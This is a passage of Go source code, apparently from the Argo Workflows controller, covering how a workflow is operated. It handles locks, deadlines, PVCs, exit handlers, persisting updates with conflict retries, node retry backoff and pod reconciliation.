repo, err := woc.controller.artifactRepositories.Get(ctx, woc.wf.Status.ArtifactRepositoryRef)
if err != nil {
woc.markWorkflowError(ctx, fmt.Errorf("failed to get artifact repository: %v", err))
return
}
woc.artifactRepository = repo
// Workflow Level Synchronization lock
if woc.execWf.Spec.Synchronization != nil {
acquired, wfUpdate, msg, err := woc.controller.syncManager.TryAcquire(woc.wf, "", woc.execWf.Spec.Synchronization)
if err != nil {
woc.log.Warn("Failed to acquire the lock")
woc.markWorkflowFailed(ctx, fmt.Sprintf("Failed to acquire the synchronization lock. %s", err.Error()))
return
}
woc.updated = wfUpdate
if !acquired {
woc.log.Warn("Workflow processing has been postponed due to concurrency limit")
woc.wf.Status.Message = msg
return
}
}
// Update workflow duration variable
woc.globalParams[common.GlobalVarWorkflowDuration] = fmt.Sprintf("%f", time.Since(woc.wf.Status.StartedAt.Time).Seconds())
// Populate the phase of all the nodes prior to execution
for _, node := range woc.wf.Status.Nodes {
woc.preExecutionNodePhases[node.ID] = node.Phase
}
if woc.wf.Status.Phase == wfv1.WorkflowUnknown {
woc.markWorkflowRunning(ctx)
err := woc.createPDBResource(ctx)
if err != nil {
msg := fmt.Sprintf("Unable to create PDB resource for workflow, %s error: %s", woc.wf.Name, err)
woc.markWorkflowFailed(ctx, msg)
return
}
woc.workflowDeadline = woc.getWorkflowDeadline()
// Workflow will not be requeued if workflow steps are in pending state.
// Workflow needs to requeue on its deadline,
if woc.workflowDeadline != nil {
woc.requeueAfter(time.Until(*woc.workflowDeadline))
}
if woc.execWf.Spec.Metrics != nil {
realTimeScope := map[string]func() float64{common.GlobalVarWorkflowDuration: func() float64 {
return time.Since(woc.wf.Status.StartedAt.Time).Seconds()
}}
woc.computeMetrics(woc.execWf.Spec.Metrics.Prometheus, woc.globalParams, realTimeScope, true)
}
woc.wf.Status.EstimatedDuration = woc.estimateWorkflowDuration()
} else {
woc.workflowDeadline = woc.getWorkflowDeadline()
err := woc.podReconciliation(ctx)
if err == nil {
woc.failSuspendedAndPendingNodesAfterDeadlineOrShutdown()
}
if err != nil {
woc.log.WithError(err).WithField("workflow", woc.wf.ObjectMeta.Name).Error("workflow timeout")
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowTimedOut", "Workflow timed out")
// TODO: we need to re-add to the workqueue, but should happen in caller
return
}
}
if woc.ShouldSuspend() {
woc.log.Infof("workflow suspended")
return
}
if woc.execWf.Spec.Parallelism != nil {
woc.activePods = woc.getActivePods("")
}
// Create a starting template context.
tmplCtx, err := woc.createTemplateContext(wfv1.ResourceScopeLocal, "")
if err != nil {
woc.log.WithError(err).Error("Failed to create a template context")
woc.markWorkflowError(ctx, err)
return
}
err = woc.substituteParamsInVolumes(woc.globalParams)
if err != nil {
woc.log.WithError(err).Error("volumes global param substitution error")
woc.markWorkflowError(ctx, err)
return
}
err = woc.createPVCs(ctx)
if err != nil {
if errorsutil.IsTransientErr(err) {
// Error was most likely caused by a lack of resources.
// In this case, Workflow will be in pending state and requeue.
woc.markWorkflowPhase(ctx, wfv1.WorkflowPending, fmt.Sprintf("Waiting for a PVC to be created. %v", err))
woc.requeue()
return
}
err = fmt.Errorf("pvc create error: %w", err)
woc.log.WithError(err).Error("pvc create error")
woc.markWorkflowError(ctx, err)
return
} else if woc.wf.Status.Phase == wfv1.WorkflowPending {
// Workflow might be in pending state if previous PVC creation is forbidden
woc.markWorkflowRunning(ctx)
}
node, err := woc.executeTemplate(ctx, woc.wf.ObjectMeta.Name, &wfv1.WorkflowStep{Template: woc.execWf.Spec.Entrypoint}, tmplCtx, woc.execWf.Spec.Arguments, &executeTemplateOpts{})
if err != nil {
woc.log.WithError(err).Error("error in entry template execution")
// we wrap this error up to report a clear message
x := fmt.Errorf("error in entry template execution: %w", err)
switch err {
case ErrDeadlineExceeded:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowTimedOut", x.Error())
case ErrParallelismReached:
default:
if !errorsutil.IsTransientErr(err) && !woc.wf.Status.Phase.Completed() && os.Getenv("BUBBLE_ENTRY_TEMPLATE_ERR") != "false" {
woc.markWorkflowError(ctx, x)
}
}
return
}
if node == nil || !node.Fulfilled() {
// node can be nil if a workflow created immediately in a parallelism == 0 state
return
}
workflowStatus := map[wfv1.NodePhase]wfv1.WorkflowPhase{
wfv1.NodePending: wfv1.WorkflowPending,
wfv1.NodeRunning: wfv1.WorkflowRunning,
wfv1.NodeSucceeded: wfv1.WorkflowSucceeded,
wfv1.NodeSkipped: wfv1.WorkflowSucceeded,
wfv1.NodeFailed: wfv1.WorkflowFailed,
wfv1.NodeError: wfv1.WorkflowError,
wfv1.NodeOmitted: wfv1.WorkflowSucceeded,
}[node.Phase]
var onExitNode *wfv1.NodeStatus
if woc.execWf.Spec.OnExit != "" && woc.GetShutdownStrategy().ShouldExecute(true) {
woc.globalParams[common.GlobalVarWorkflowStatus] = string(workflowStatus)
var failures []failedNodeStatus
for _, node := range woc.wf.Status.Nodes {
if node.Phase == wfv1.NodeFailed || node.Phase == wfv1.NodeError {
failures = append(failures,
failedNodeStatus{
DisplayName: node.DisplayName,
Message: node.Message,
TemplateName: node.TemplateName,
Phase: string(node.Phase),
PodName: node.ID,
FinishedAt: node.FinishedAt,
})
}
}
failedNodeBytes, err := json.Marshal(failures)
if err != nil {
woc.log.Errorf("Error marshalling failed nodes list: %+v", err)
// No need to return here
}
// This strconv.Quote is necessary so that the escaped quotes are not removed during parameter substitution
woc.globalParams[common.GlobalVarWorkflowFailures] = strconv.Quote(string(failedNodeBytes))
woc.log.Infof("Running OnExit handler: %s", woc.execWf.Spec.OnExit)
onExitNodeName := common.GenerateOnExitNodeName(woc.wf.ObjectMeta.Name)
onExitNode, err = woc.executeTemplate(ctx, onExitNodeName, &wfv1.WorkflowStep{Template: woc.execWf.Spec.OnExit}, tmplCtx, woc.execWf.Spec.Arguments, &executeTemplateOpts{onExitTemplate: true})
if err != nil {
woc.log.WithError(err).Error("error in exit template execution")
if !woc.wf.Status.Phase.Completed() {
woc.markWorkflowError(ctx, fmt.Errorf("error in exit template execution: %w", err))
}
return
}
if onExitNode == nil || !onExitNode.Fulfilled() {
return
}
}
var workflowMessage string
if node.FailedOrError() && woc.GetShutdownStrategy().Enabled() {
workflowMessage = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
workflowMessage = node.Message
}
// If we get here, the workflow completed, all PVCs were deleted successfully, and
// exit handlers were executed. We now need to infer the workflow phase from the
// node phase.
switch workflowStatus {
case wfv1.WorkflowSucceeded:
if onExitNode != nil && onExitNode.FailedOrError() {
// if main workflow succeeded, but the exit node was unsuccessful
// the workflow is now considered unsuccessful.
switch onExitNode.Phase {
case wfv1.NodeFailed:
woc.markWorkflowFailed(ctx, onExitNode.Message)
default:
woc.markWorkflowError(ctx, fmt.Errorf(onExitNode.Message))
}
} else {
woc.markWorkflowSuccess(ctx)
}
case wfv1.WorkflowFailed:
woc.markWorkflowFailed(ctx, workflowMessage)
case wfv1.WorkflowError:
woc.markWorkflowPhase(ctx, wfv1.WorkflowError, workflowMessage)
default:
// NOTE: we should never make it here because if the node was 'Running' we should have
// returned earlier.
err = errors.InternalErrorf("Unexpected node phase %s: %+v", woc.wf.ObjectMeta.Name, err)
woc.markWorkflowError(ctx, err)
}
if woc.execWf.Spec.Metrics != nil {
realTimeScope := map[string]func() float64{common.GlobalVarWorkflowDuration: func() float64 {
return node.FinishedAt.Sub(node.StartedAt.Time).Seconds()
}}
woc.globalParams[common.GlobalVarWorkflowStatus] = string(workflowStatus)
woc.computeMetrics(woc.execWf.Spec.Metrics.Prometheus, woc.globalParams, realTimeScope, false)
}
err = woc.deletePVCs(ctx)
if err != nil {
woc.log.WithError(err).Warn("failed to delete PVCs")
}
}
func (woc *wfOperationCtx) getContainerRuntimeExecutor() string {
return woc.controller.GetContainerRuntimeExecutor(labels.Set(woc.wf.Labels))
}
func (woc *wfOperationCtx) getWorkflowDeadline() *time.Time {
if woc.execWf.Spec.ActiveDeadlineSeconds == nil {
return nil
}
if woc.wf.Status.StartedAt.IsZero() {
return nil
}
startedAt := woc.wf.Status.StartedAt.Truncate(time.Second)
deadline := startedAt.Add(time.Duration(*woc.execWf.Spec.ActiveDeadlineSeconds) * time.Second).UTC()
return &deadline
}
// setGlobalParameters sets the globalParam map with global parameters
func (woc *wfOperationCtx) setGlobalParameters(executionParameters wfv1.Arguments) {
woc.globalParams[common.GlobalVarWorkflowName] = woc.wf.ObjectMeta.Name
woc.globalParams[common.GlobalVarWorkflowNamespace] = woc.wf.ObjectMeta.Namespace
woc.globalParams[common.GlobalVarWorkflowServiceAccountName] = woc.execWf.Spec.ServiceAccountName
woc.globalParams[common.GlobalVarWorkflowUID] = string(woc.wf.ObjectMeta.UID)
woc.globalParams[common.GlobalVarWorkflowCreationTimestamp] = woc.wf.ObjectMeta.CreationTimestamp.Format(time.RFC3339)
if annotation := woc.wf.ObjectMeta.GetAnnotations(); annotation != nil {
val, ok := annotation[common.AnnotationKeyCronWfScheduledTime]
if ok {
woc.globalParams[common.GlobalVarWorkflowCronScheduleTime] = val
}
}
if woc.execWf.Spec.Priority != nil {
woc.globalParams[common.GlobalVarWorkflowPriority] = strconv.Itoa(int(*woc.execWf.Spec.Priority))
}
for char := range strftime.FormatChars {
cTimeVar := fmt.Sprintf("%s.%s", common.GlobalVarWorkflowCreationTimestamp, string(char))
woc.globalParams[cTimeVar] = strftime.Format("%"+string(char), woc.wf.ObjectMeta.CreationTimestamp.Time)
}
woc.globalParams[common.GlobalVarWorkflowCreationTimestamp+".s"] = strconv.FormatInt(woc.wf.ObjectMeta.CreationTimestamp.Time.Unix(), 10)
if workflowParameters, err := json.Marshal(woc.execWf.Spec.Arguments.Parameters); err == nil {
woc.globalParams[common.GlobalVarWorkflowParameters] = string(workflowParameters)
}
for _, param := range executionParameters.Parameters {
woc.globalParams["workflow.parameters."+param.Name] = param.Value.String()
}
for k, v := range woc.wf.ObjectMeta.Annotations {
woc.globalParams["workflow.annotations."+k] = v
}
for k, v := range woc.wf.ObjectMeta.Labels {
woc.globalParams["workflow.labels."+k] = v
}
if woc.wf.Status.Outputs != nil {
for _, param := range woc.wf.Status.Outputs.Parameters {
if param.HasValue() {
woc.globalParams["workflow.outputs.parameters."+param.Name] = param.GetValue()
}
}
}
}
// persistUpdates will update a workflow with any updates made during workflow operation.
// It also labels any pods as completed if we have extracted everything we need from it.
// NOTE: a previous implementation used Patch instead of Update, but Patch does not work with
// the fake CRD clientset which makes unit testing extremely difficult.
func (woc *wfOperationCtx) persistUpdates(ctx context.Context) {
if !woc.updated {
return
}
diff.LogChanges(woc.orig, woc.wf)
resource.UpdateResourceDurations(woc.wf)
progress.UpdateProgress(woc.wf)
// You MUST not call `persistUpdates` twice.
// * Fails the `reapplyUpdate` cannot work unless resource versions are different.
// * It will double the number of Kubernetes API requests.
if woc.orig.ResourceVersion != woc.wf.ResourceVersion {
woc.log.Panic("cannot persist updates with mismatched resource versions")
}
wfClient := woc.controller.wfclientset.ArgoprojV1alpha1().Workflows(woc.wf.ObjectMeta.Namespace)
// try and compress nodes if needed
nodes := woc.wf.Status.Nodes
err := woc.controller.hydrator.Dehydrate(woc.wf)
if err != nil {
woc.log.Warnf("Failed to dehydrate: %v", err)
woc.markWorkflowError(ctx, err)
}
// Release all acquired lock for completed workflow
if woc.wf.Status.Synchronization != nil && woc.wf.Status.Fulfilled() {
if woc.controller.syncManager.ReleaseAll(woc.wf) {
woc.log.WithFields(log.Fields{"key": woc.wf.Name}).Info("Released all acquired locks")
}
}
wf, err := wfClient.Update(ctx, woc.wf, metav1.UpdateOptions{})
if err != nil {
woc.log.Warnf("Error updating workflow: %v %s", err, apierr.ReasonForError(err))
if argokubeerr.IsRequestEntityTooLargeErr(err) {
woc.persistWorkflowSizeLimitErr(ctx, wfClient, err)
return
}
if !apierr.IsConflict(err) {
return
}
woc.log.Info("Re-applying updates on latest version and retrying update")
wf, err := woc.reapplyUpdate(ctx, wfClient, nodes)
if err != nil {
woc.log.Infof("Failed to re-apply update: %+v", err)
return
}
woc.wf = wf
} else {
woc.wf = wf
woc.controller.hydrator.HydrateWithNodes(woc.wf, nodes)
}
// The workflow returned from wfClient.Update doesn't have a TypeMeta associated
// with it, so copy from the original workflow.
woc.wf.TypeMeta = woc.orig.TypeMeta
// Create WorkflowNode* events for nodes that have changed phase
woc.recordNodePhaseChangeEvents(woc.orig.Status.Nodes, woc.wf.Status.Nodes)
if !woc.controller.hydrator.IsHydrated(woc.wf) {
panic("workflow should be hydrated")
}
woc.log.WithFields(log.Fields{"resourceVersion": woc.wf.ResourceVersion, "phase": woc.wf.Status.Phase}).Info("Workflow update successful")
switch os.Getenv("INFORMER_WRITE_BACK") {
// By default we write back (as per v2.11), this does not reduce errors, but does reduce
// conflicts and therefore we log fewer warning messages.
case "", "true":
if err := woc.writeBackToInformer(); err != nil {
woc.markWorkflowError(ctx, err)
return
}
case "false":
time.Sleep(1 * time.Second)
}
// It is important that we *never* label pods as completed until we successfully updated the workflow
// Failing to do so means we can have inconsistent state.
// TODO: The completedPods will be labeled multiple times. I think it would be improved in the future.
// Send succeeded pods or completed pods to gcPods channel to delete it later depend on the PodGCStrategy.
// Notice we do not need to label the pod if we will delete it later for GC. Otherwise, that may even result in
// errors if we label a pod that was deleted already.
for podName, podPhase := range woc.completedPods {
if woc.execWf.Spec.PodGC != nil {
switch woc.execWf.Spec.PodGC.Strategy {
case wfv1.PodGCOnPodSuccess:
if podPhase == apiv1.PodSucceeded {
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, deletePod)
}
case wfv1.PodGCOnPodCompletion:
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, deletePod)
}
} else {
// label pods which will not be deleted
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, labelPodCompleted)
}
}
}
func (woc *wfOperationCtx) writeBackToInformer() error {
un, err := wfutil.ToUnstructured(woc.wf)
if err != nil {
return fmt.Errorf("failed to convert workflow to unstructured: %w", err)
}
err = woc.controller.wfInformer.GetStore().Update(un)
if err != nil {
return fmt.Errorf("failed to update informer store: %w", err)
}
return nil
}
// persistWorkflowSizeLimitErr will fail a the workflow with an error when we hit the resource size limit
// See https://github.com/argoproj/argo-workflows/issues/913
func (woc *wfOperationCtx) persistWorkflowSizeLimitErr(ctx context.Context, wfClient v1alpha1.WorkflowInterface, err error) {
woc.wf = woc.orig.DeepCopy()
woc.markWorkflowError(ctx, err)
_, err = wfClient.Update(ctx, woc.wf, metav1.UpdateOptions{})
if err != nil {
woc.log.Warnf("Error updating workflow with size error: %v", err)
}
}
// reapplyUpdate GETs the latest version of the workflow, re-applies the updates and
// retries the UPDATE multiple times. For reasoning behind this technique, see:
// https://github.com/kubernetes/community/blob/master/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
func (woc *wfOperationCtx) reapplyUpdate(ctx context.Context, wfClient v1alpha1.WorkflowInterface, nodes wfv1.Nodes) (*wfv1.Workflow, error) {
// if this condition is true, then this func will always error
if woc.orig.ResourceVersion != woc.wf.ResourceVersion {
woc.log.Panic("cannot re-apply update with mismatched resource versions")
}
err := woc.controller.hydrator.Hydrate(woc.orig)
if err != nil {
return nil, err
}
// First generate the patch
oldData, err := json.Marshal(woc.orig)
if err != nil {
return nil, err
}
woc.controller.hydrator.HydrateWithNodes(woc.wf, nodes)
newData, err := json.Marshal(woc.wf)
if err != nil {
return nil, err
}
patchBytes, err := jsonpatch.CreateMergePatch(oldData, newData)
if err != nil {
return nil, err
}
// Next get latest version of the workflow, apply the patch and retry the update
attempt := 1
for {
currWf, err := wfClient.Get(ctx, woc.wf.ObjectMeta.Name, metav1.GetOptions{})
if err != nil {
return nil, err
}
// There is something about having informer indexers (introduced in v2.12) that means we are more likely to operate on the
// previous version of the workflow. This means under high load, a previously successful workflow could
// be operated on again. This can error (e.g. if any pod was deleted as part of clean-up). This check prevents that.
// https://github.com/argoproj/argo-workflows/issues/4798
if currWf.Status.Fulfilled() {
return nil, fmt.Errorf("must never update completed workflows")
}
err = woc.controller.hydrator.Hydrate(currWf)
if err != nil {
return nil, err
}
for id, node := range woc.wf.Status.Nodes {
currNode, exists := currWf.Status.Nodes[id]
if exists && currNode.Fulfilled() && node.Phase != currNode.Phase {
return nil, fmt.Errorf("must never update completed node %s", id)
}
}
currWfBytes, err := json.Marshal(currWf)
if err != nil {
return nil, err
}
newWfBytes, err := jsonpatch.MergePatch(currWfBytes, patchBytes)
if err != nil {
return nil, err
}
var newWf wfv1.Workflow
err = json.Unmarshal(newWfBytes, &newWf)
if err != nil {
return nil, err
}
err = woc.controller.hydrator.Dehydrate(&newWf)
if err != nil {
return nil, err
}
wf, err := wfClient.Update(ctx, &newWf, metav1.UpdateOptions{})
if err == nil {
woc.log.Infof("Update retry attempt %d successful", attempt)
woc.controller.hydrator.HydrateWithNodes(wf, nodes)
return wf, nil
}
attempt++
woc.log.Warnf("Update retry attempt %d failed: %v", attempt, err)
if attempt > 5 {
return nil, err
}
}
}
// requeue this workflow onto the workqueue for later processing
func (woc *wfOperationCtx) requeueAfter(afterDuration time.Duration) {
key, _ := cache.MetaNamespaceKeyFunc(woc.wf)
woc.controller.wfQueue.AddAfter(key, afterDuration)
}
func (woc *wfOperationCtx) requeue() {
key, _ := cache.MetaNamespaceKeyFunc(woc.wf)
woc.controller.wfQueue.AddRateLimited(key)
}
// processNodeRetries updates the retry node state based on the child node state and the retry strategy and returns the node.
func (woc *wfOperationCtx) processNodeRetries(node *wfv1.NodeStatus, retryStrategy wfv1.RetryStrategy, opts *executeTemplateOpts) (*wfv1.NodeStatus, bool, error) {
if node.Fulfilled() {
return node, true, nil
}
lastChildNode := getChildNodeIndex(node, woc.wf.Status.Nodes, -1)
if lastChildNode == nil {
return node, true, nil
}
if !lastChildNode.Fulfilled() {
// last child node is still running.
return node, true, nil
}
if !lastChildNode.FailedOrError() {
node.Outputs = lastChildNode.Outputs.DeepCopy()
woc.wf.Status.Nodes[node.ID] = *node
return woc.markNodePhase(node.Name, wfv1.NodeSucceeded), true, nil
}
if woc.GetShutdownStrategy().Enabled() || (woc.workflowDeadline != nil && time.Now().UTC().After(*woc.workflowDeadline)) {
var message string
if woc.GetShutdownStrategy().Enabled() {
message = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
message = fmt.Sprintf("retry exceeded workflow deadline %s", *woc.workflowDeadline)
}
woc.log.Infoln(message)
return woc.markNodePhase(node.Name, lastChildNode.Phase, message), true, nil
}
if retryStrategy.Backoff != nil {
maxDurationDeadline := time.Time{}
// Process max duration limit
if retryStrategy.Backoff.MaxDuration != "" && len(node.Children) > 0 {
maxDuration, err := parseStringToDuration(retryStrategy.Backoff.MaxDuration)
if err != nil {
return nil, false, err
}
firstChildNode := getChildNodeIndex(node, woc.wf.Status.Nodes, 0)
maxDurationDeadline = firstChildNode.StartedAt.Add(maxDuration)
if time.Now().After(maxDurationDeadline) {
woc.log.Infoln("Max duration limit exceeded. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "Max duration limit exceeded"), true, nil
}
}
// Max duration limit hasn't been exceeded, process back off
if retryStrategy.Backoff.Duration == "" {
return nil, false, fmt.Errorf("no base duration specified for retryStrategy")
}
baseDuration, err := parseStringToDuration(retryStrategy.Backoff.Duration)
if err != nil {
return nil, false, err
}
timeToWait := baseDuration
retryStrategyBackoffFactor, err := intstr.Int32(retryStrategy.Backoff.Factor)
if err != nil {
return nil, false, err
}
if retryStrategyBackoffFactor != nil && *retryStrategyBackoffFactor > 0 {
// Formula: timeToWait = duration * factor^retry_number
// Note that timeToWait should equal to duration for the first retry attempt.
timeToWait = baseDuration * time.Duration(math.Pow(float64(*retryStrategyBackoffFactor), float64(len(node.Children)-1)))
}
waitingDeadline := lastChildNode.FinishedAt.Add(timeToWait)
// If the waiting deadline is after the max duration deadline, then it's futile to wait until then. Stop early
if !maxDurationDeadline.IsZero() && waitingDeadline.After(maxDurationDeadline) {
woc.log.Infoln("Backoff would exceed max duration limit. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "Backoff would exceed max duration limit"), true, nil
}
// See if we have waited past the deadline
if time.Now().Before(waitingDeadline) {
woc.requeueAfter(timeToWait)
retryMessage := fmt.Sprintf("Backoff for %s", humanize.Duration(timeToWait))
return woc.markNodePhase(node.Name, node.Phase, retryMessage), false, nil
}
woc.log.WithField("node", node.Name).Infof("node has maxDuration set, setting executionDeadline to: %s", humanize.Timestamp(maxDurationDeadline))
opts.executionDeadline = maxDurationDeadline
node = woc.markNodePhase(node.Name, node.Phase, "")
}
var retryOnFailed bool
var retryOnError bool
switch retryStrategy.RetryPolicy {
case wfv1.RetryPolicyAlways:
retryOnFailed = true
retryOnError = true
case wfv1.RetryPolicyOnError:
retryOnFailed = false
retryOnError = true
case wfv1.RetryPolicyOnTransientError:
if (lastChildNode.Phase == wfv1.NodeFailed || lastChildNode.Phase == wfv1.NodeError) && errorsutil.IsTransientErr(errors.InternalError(lastChildNode.Message)) {
retryOnFailed = true
retryOnError = true
}
case wfv1.RetryPolicyOnFailure, "":
retryOnFailed = true
retryOnError = false
default:
return nil, false, fmt.Errorf("%s is not a valid RetryPolicy", retryStrategy.RetryPolicy)
}
if (lastChildNode.Phase == wfv1.NodeFailed && !retryOnFailed) || (lastChildNode.Phase == wfv1.NodeError && !retryOnError) {
woc.log.Infof("Node not set to be retried after status: %s", lastChildNode.Phase)
return woc.markNodePhase(node.Name, lastChildNode.Phase, lastChildNode.Message), true, nil
}
if !lastChildNode.CanRetry() {
woc.log.Infof("Node cannot be retried. Marking it failed")
return woc.markNodePhase(node.Name, lastChildNode.Phase, lastChildNode.Message), true, nil
}
limit, err := intstr.Int32(retryStrategy.Limit)
if err != nil {
return nil, false, err
}
if retryStrategy.Limit != nil && limit != nil && int32(len(node.Children)) > *limit {
woc.log.Infoln("No more retries left. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "No more retries left"), true, nil
}
woc.log.Infof("%d child nodes of %s failed. Trying again...", len(node.Children), node.Name)
return node, true, nil
}
// podReconciliation is the process by which a workflow will examine all its related
// pods and update the node state before continuing the evaluation of the workflow.
// Records all pods which were observed completed, which will be labeled completed=true
// after successful persist of the workflow.
func (woc *wfOperationCtx) podReconciliation(ctx context.Context) error {
podList, err := woc.getAllWorkflowPods()
if err != nil {
return err
}
seenPods := make(map[string]*apiv1.Pod)
seenPodLock := &sync.Mutex{}
wfNodesLock := &sync.RWMutex{}
podRunningCondition := wfv1.Condition{Type: wfv1.ConditionTypePodRunning, Status: metav1.ConditionFalse}
performAssessment := func(pod *apiv1.Pod) {
if pod == nil {
return
}
nodeNameForPod := pod.Annotations[common.AnnotationKeyNodeName]
nodeID := woc.wf.NodeID(nodeNameForPod)
seenPodLock.Lock()
seenPods[nodeID] = pod
seenPodLock.Unlock()
wfNodesLock.Lock()
defer wfNodesLock.Unlock()
if node, ok := woc.wf.Status.Nodes[nodeID]; ok {
if newState := woc.assessNodeStatus(pod, &node); newState != nil {
woc.wf.Status.Nodes[nodeID] = *newState
woc.addOutputsToGlobalScope(node.Outputs)
if node.MemoizationStatus != nil {
if node.Succeeded() {
c := woc.controller.cacheFactory.GetCache(controllercache.ConfigMapCache, node.MemoizationStatus.CacheName)
err := c.Save(ctx, node.MemoizationStatus.Key, node.ID, node.Outputs)
if err != nil {
woc.log.WithFields(log.Fields{"nodeID": node.ID}).WithError(err).Error("Failed to save node outputs to cache")
node.Phase = wfv1.NodeError
}
}
}
if node.Phase == wfv1.NodeRunning {
podRunningCondition.Status = metav1.ConditionTrue
}
woc.updated = true
}
node := woc.wf.Status.Nodes[pod.ObjectMeta.Name]
match := true
if woc.execWf.Spec.PodGC.GetLabelSelector() != nil {
var podLabels labels.Set = pod.GetLabels()
match, err = woc.execWf.Spec.PodGC.Matches(podLabels)
if err != nil {
woc.markWorkflowFailed(ctx, fmt.Sprintf("failed to parse label selector %s for pod GC: %v", woc.execWf.Spec.PodGC.LabelSelector, err))
return
}
}
if node.Fulfilled() && !node.IsDaemoned() {
if pod.GetLabels()[common.LabelKeyCompleted] == "true" {
return
}
if match {
woc.completedPods[pod.Name] = pod.Status.Phase
}
if woc.shouldPrintPodSpec(node) {
printPodSpecLog(pod, woc.wf.Name)
}
}
if node.Succeeded() && match {
woc.completedPods[pod.Name] = pod.Status.Phase
}
}
}
parallelPodNum := make(chan string, 500)
var wg sync.WaitGroup
for _, pod := range podList {
parallelPodNum <- pod.Name
wg.Add(1)
go func(pod *apiv1.Pod) {
defer wg.Done()
performAssessment(pod)
err = woc.applyExecutionControl(ctx, pod, wfNodesLock)
if err != nil {
woc.log.Warnf("Failed to apply execution control to pod %s", pod.Name)
}
<-parallelPodNum
}(pod)
}
wg.Wait()
woc.wf.Status.Conditions.UpsertCondition(podRunningCondition)
// Now check for deleted pods. Iterate our nodes. If any one of our nodes does not show up in
// the seen list it implies that the pod was deleted without the controller seeing the event.
// It is now impossible to infer pod status. We can do at this point is to mark the node with Error, or
// we can re-submit it.
for nodeID, node := range woc.wf.Status.Nodes {
if node.Type != wfv1.NodeTypePod || node.Phase.Fulfilled() || node.StartedAt.IsZero() {
// node is not a pod, it is already complete, or it can be re-run.
continue
}
if seenPod, ok := seenPods[nodeID]; !ok {
// grace-period to allow informer sync
recentlyStarted := recentlyStarted(node)
woc.log.WithFields(log.Fields{"podName": node.Name, "nodePhase": node.Phase, "recentlyStarted": recentlyStarted}).Info("Workflow pod is missing")
metrics.PodMissingMetric.WithLabelValues(strconv.FormatBool(recentlyStarted), string(node.Phase)).Inc()
// If the node is pending and the pod does not exist, it could be the case that we want to try to submit it
// again instead of marking it as an error. Check if that's the case.
if node.Pending() {
continue
}
if recentlyStarted {
// If the pod was deleted, then we it is possible that the controller never get another informer message about it.
// In this case, the workflow will only be requeued after the resync period (20m). This means
// workflow will not update for 20m. Requeuing here prevents that happening.
woc.requeue()
continue
}
if node.Daemoned != nil && *node.Daemoned {
node.Daemoned = nil
woc.updated = true
}
woc.markNodePhase(node.Name, wfv1.NodeError, "pod deleted")
} else {
// At this point we are certain that the pod associated with our node is running or has been run;
// it is safe to extract the k8s-node information given this knowledge.
if node.HostNodeName != seenPod.Spec.NodeName {
node.HostNodeName = seenPod.Spec.NodeName
woc.wf.Status.Nodes[nodeID] = node
woc.updated = true
}
}
}
return nil
}
func recentlyStarted(node wfv1.NodeStatus) bool {
return time.Since(node.StartedAt.Time) <= envutil.LookupEnvDurationOr("RECENTLY_STARTED_POD_DURATION", 10*time.Second)
}
// shouldPrintPodSpec return eligible to print to the pod spec
func (woc *wfOperationCtx) shouldPrintPodSpec(node wfv1.NodeStatus) bool {
return woc.controller.Config.PodSpecLogStrategy.AllPods ||
(woc.controller.Config.PodSpecLogStrategy.FailedPod && node.FailedOrError())
}
// fails any suspended and pending nodes if the workflow deadline has passed
func (woc *wfOperationCtx) failSuspendedAndPendingNodesAfterDeadlineOrShutdown() {
deadlineExceeded := woc.workflowDeadline != nil && time.Now().UTC().After(*woc.workflowDeadline)
if woc.GetShutdownStrategy().Enabled() || deadlineExceeded {
for _, node := range woc.wf.Status.Nodes {
if node.IsActiveSuspendNode() || (node.Phase == wfv1.NodePending && deadlineExceeded) {
var message string
if woc.GetShutdownStrategy().Enabled() {
message = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
message = "Step exceeded its deadline"
}
woc.markNodePhase(node.Name, wfv1.NodeFailed, message)
}
}
}
}
// getAllWorkflowPods returns all pods related to the current workflow
func (woc *wfOperationCtx) getAllWorkflowPods() ([]*apiv1.Pod, error) {
objs, err := woc.controller.podInformer.GetIndexer().ByIndex(indexes.WorkflowIndex, indexes.WorkflowIndexValue(woc.wf.Namespace, woc.wf.Name))
if err != nil {
return nil, err
}
pods := make([]*apiv1.Pod, len(objs))
for i, obj := range objs {
pod, ok := obj.(*apiv1.Pod)
if !ok {
return nil, fmt.Errorf("expected \"*apiv1.Pod\", got \"%v\"", reflect.TypeOf(obj).String())
}
pods[i] = pod
}
return pods, nil
}
func printPodSpecLog(pod *apiv1.Pod, wfName string) {
podSpecByte, err := json.Marshal(pod)
if err != nil {
log.WithField("workflow", wfName).WithField("nodename", pod.Name).WithField("namespace", pod.Namespace).Warnf("Unable to mashal pod spec. %v", err)
}
log.WithField("workflow", wfName).WithField("nodename", pod.Name).WithField("namespace", pod.Namespace).Infof("Pod Spec: %s", string(podSpecByte))
}
// assessNodeStatus compares the current state of a pod with its corresponding node
// and returns the new node status if something changed
func (woc *wfOperationCtx) assessNodeStatus(pod *apiv1.Pod, node *wfv1.NodeStatus) *wfv1.NodeStatus {
var newPhase wfv1.NodePhase
var newDaemonStatus *bool
var message string
updated := false
switch pod.Status.Phase {
case apiv1.PodPending:
newPhase = wfv1.NodePending
newDaemonStatus = pointer.BoolPtr(false)
message = getPendingReason(pod)
case apiv1.PodSucceeded:
newPhase = wfv1.NodeSucceeded
newDaemonStatus = pointer.BoolPtr(false)
case apiv1.PodFailed:
// ignore pod failure for daemoned steps
if node.IsDaemoned() {
newPhase = wfv1.NodeSucceeded
} else {
newPhase, message = woc.inferFailedReason(pod)
woc.log.WithField("displayName", node.DisplayName).WithField("templateName", node.TemplateName).
WithField("pod", pod.Name).Infof("Pod failed: %s", message)
}
newDaemonStatus = pointer.BoolPtr(false)
case apiv1.PodRunning:
newPhase = wfv1.NodeRunning
tmplStr, ok := pod.Annotations[common.AnnotationKeyTemplate]
if !ok {
woc.log.WithField("pod", pod.ObjectMeta.Name).Warn("missing template annotation")
return nil
}
var tmpl wfv1.Template
